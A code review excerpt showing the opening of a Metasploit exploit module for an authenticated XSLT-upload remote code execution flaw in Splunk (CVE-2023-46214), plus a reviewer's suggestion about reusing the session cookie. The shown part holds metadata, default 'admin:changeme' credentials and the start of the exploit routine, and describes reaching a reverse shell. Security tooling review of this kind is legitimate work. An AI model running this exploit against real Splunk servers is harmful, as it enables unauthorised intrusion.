modules/exploits/unix/http/splunk_xslt_authenticated_rce.rb

```diff
@@ -0,0 +1,406 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Splunk Authenticated XSLT Upload RCE',
+        'Description' => %q{
+          This Metasploit module exploits a Remote Code Execution (RCE) vulnerability in Splunk Enterprise.
+          The affected versions include 9.0.x before 9.0.7 and 9.1.x before 9.1.2. The exploitation process leverages
+          a weakness in the XSLT transformation functionality of Splunk. Successful exploitation requires valid
+          credentials, typically 'admin:changeme' by default.
+
+          The exploit involves uploading a malicious XSLT file to the target system. This file, when processed by the
+          vulnerable Splunk server, leads to the execution of arbitrary code. The module then utilizes the 'runshellscript'
+          capability in Splunk to execute the payload, which can be tailored to establish a reverse shell. This provides
+          the attacker with remote control over the compromised Splunk instance. The module is designed to work
+          seamlessly, ensuring successful exploitation under the right conditions.
+        },
+        'Author' => [
+          'nathan', # Writeup and PoC
+          'Valentin Lobstein', # Metasploit module
+          'h00die', # Assistance in module development
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2023-46214'],
+          ['URL', 'https://github.com/nathan31337/Splunk-RCE-poc'],
+          ['URL', 'https://advisory.splunk.com/advisories/SVD-2023-1104'], # Vendor Advisory
+          ['URL', 'https://blog.hrncirik.net/cve-2023-46214-analysis'], # Writeup
+        ],
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_PHP, ARCH_CMD],
+        'Targets' => [['Automatic', {}]],
+        'DisclosureDate' => '2023-11-28',
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 8000
+
+        },
+        'Privileged' => false,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('USERNAME', [true, 'Username for Splunk', 'admin']),
+        OptString.new('PASSWORD', [true, 'Password for Splunk', 'changeme']),
+        OptString.new('RANDOM_FILENAME', [false, 'Random filename with 8 characters', Rex::Text.rand_text_alpha(8)]),
+      ]
+    )
+  end
+
+  def exploit
+    cookie_string = authenticate
+    unless cookie_string
```

Comment:
OK, so this seems odd, but since we're more often than not going to call the `check` method first, do we need to authenticate again?  Could we check to see if we have the `cookie_string`, then try to authenticate if we don't have it, like this?  We'd basically be checking `cookie_string` twice, so it looks odd to me, but I like the behavior.

```suggestion
    cookie_string = authenticate unless cookie_string
    unless cookie_string
```